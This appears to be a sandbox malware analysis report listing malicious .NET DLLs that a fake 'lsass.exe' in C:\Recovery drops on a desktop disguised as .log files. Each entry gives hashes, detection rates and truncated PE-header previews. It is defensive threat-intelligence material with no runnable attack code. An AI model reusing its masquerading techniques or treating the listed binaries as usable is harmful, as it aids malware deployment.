MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\AsWoiMty.log

Download File

Process:	C:\Recovery\lsass.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\CKyWUHyH.log

Download File

Process:	C:\Recovery\lsass.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\CYkgyfvY.log

Download File

Process:	C:\Recovery\lsass.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\CmKYhHkf.log

Download File

Process:	C:\Recovery\lsass.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\EaXPTOzT.log

Download File

Process:	C:\Recovery\lsass.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\FrxXNAmm.log

Download File

Process:	C:\Recovery\lsass.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\GQmWAABO.log

Download File

Process:	C:\Recovery\lsass.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\HInMzsNO.log

Download File

Process:	C:\Recovery\lsass.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\JeCeCscc.log

Download File

Process:	C:\Recovery\lsass.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\LkfFbrxk.log

Download File

Process:	C:\Recovery\lsass.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\MhHNxrMf.log

Download File

Process:	C:\Recovery\lsass.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\MtSmEjDp.log

Download File

Process:	C:\Recovery\lsass.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\PgRkIPoV.log

Download File

Process:	C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\QXsvSdGP.log

Download File

Process:	C:\Recovery\lsass.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\QrHcjUSw.log

Download File

Process:	C:\Recovery\lsass.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\RIKTmlsJ.log

Download File

Process:	C:\Recovery\lsass.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\TBLKldEI.log

Download File

Process:	C:\Recovery\lsass.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\UKBLugCN.log

Download File

Process:	C:\Recovery\lsass.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\UynSGdTD.log

Download File

Process:	C:\Recovery\lsass.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\XVlEhDHN.log

Download File

Process:	C:\Recovery\lsass.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
